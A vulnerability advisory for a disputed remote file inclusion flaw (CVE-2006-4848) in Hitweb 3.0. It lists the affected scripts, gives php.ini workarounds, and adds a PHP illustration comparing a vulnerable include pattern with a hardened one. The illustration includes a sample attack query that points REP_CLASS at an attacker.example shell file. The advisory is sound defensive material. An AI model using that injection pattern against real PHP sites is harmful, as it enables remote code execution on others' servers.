PT-2006-5603 · Hitweb · Hitweb

Erne · Published 2006-09-19 · Updated 2024-08-07 · CVE-2006-4848

CVSS v2.0: 7.5 (High) · Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Name of the Vulnerable Software and Affected Versions: Hitweb 3.0
Description: Hitweb 3.0 is reported to contain multiple remote file inclusion vulnerabilities that allow remote attackers to execute arbitrary PHP code by supplying a URL in the REP_CLASS parameter to any of index.php, arbo.php, framepoint.php, genpage.php, lienvalider.php, appreciation.php, partenariat.php, rechercher.php, projet.php, propoexample.php, refererpoint.php or top50.php. The report is disputed by a third-party researcher, who states that REP_CLASS is initialized in an included file before it is used; if that is so, a value injected through the request (for example via register_globals) would be overwritten before it reaches include(), and the parameter would not be under the attacker's control.
Recommendations: For Hitweb 3.0, as a temporary workaround until a patch is available, make sure that client-supplied values cannot reach the REP_CLASS variable: with register_globals disabled a request parameter cannot populate it, and with allow_url_fopen disabled (and allow_url_include disabled on PHP 5.2 or later) include() cannot fetch a remote file at all, which removes the remote-inclusion vector whether or not the dispute is correct. Additionally, restrict access to the affected pages (index.php, arbo.php, framepoint.php, genpage.php, lienvalider.php, appreciation.php, partenariat.php, rechercher.php, projet.php, propoexample.php, refererpoint.php and top50.php) to minimize the risk of exploitation.
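The inclusion pattern the description refers to, placed beside a hardened form that implements the recommendation above, as an added illustration written for this page and not Hitweb's own code. Only the variable name REP_CLASS comes from the advisory; the directory layout, the included file name config.inc.php, the function names and the constructed attacker query string are assumptions.

```php
<?php
// Added illustration (not Hitweb code). Shows why a path built from a
// request-controlled variable becomes a remote file inclusion, and how
// an allowlisted, request-independent path closes it.

// --- Vulnerable pattern (assumed shape of the reported flaw) ---
// With register_globals=On, ?REP_CLASS=http://attacker.example/x sets
// $REP_CLASS before this function runs; with allow_url_fopen=On (PHP 5.2+
// also needs allow_url_include=On), include() fetches and executes the
// remote file. The dispute on this CVE amounts to saying that the real
// code assigns $REP_CLASS locally before this point, discarding the
// injected value.
function vulnerable_include_path($REP_CLASS) {
    return $REP_CLASS . '/config.inc.php';   // attacker controls the prefix
}

// --- Hardened form ---
// The include directory is a fixed, server-side constant (assumed name and
// location); nothing from the request participates in building the path.
define('HITWEB_REP_CLASS', __DIR__ . '/classes');

function safe_include_path(array $request) {
    // Belt and braces: if a client still sends REP_CLASS, refuse anything
    // that looks like a URL scheme or directory traversal instead of
    // silently ignoring it, so the attempt is visible in error logs.
    if (isset($request['REP_CLASS'])) {
        $v = (string) $request['REP_CLASS'];
        if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $v) || strpos($v, '..') !== false) {
            error_log('Rejected REP_CLASS value: ' . $v);
            return null;
        }
    }
    return HITWEB_REP_CLASS . '/config.inc.php';
}

// Constructed attacker request, parsed the way PHP would parse a query string.
parse_str('REP_CLASS=http://attacker.example/shell.txt?', $q);

var_dump(vulnerable_include_path($q['REP_CLASS']));   // remote URL as path prefix
var_dump(safe_include_path($q));                       // refused
var_dump(safe_include_path([]));                       // fixed local path
```

The same check can be applied without touching application code by disabling register_globals and allow_url_fopen in php.ini, which is the quicker workaround on a deployed Hitweb 3.0; the hardened function is what a code-level fix would look like.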

Exploit

Fix


Related identifiers

CVE-2006-4848

Affected products

Hitweb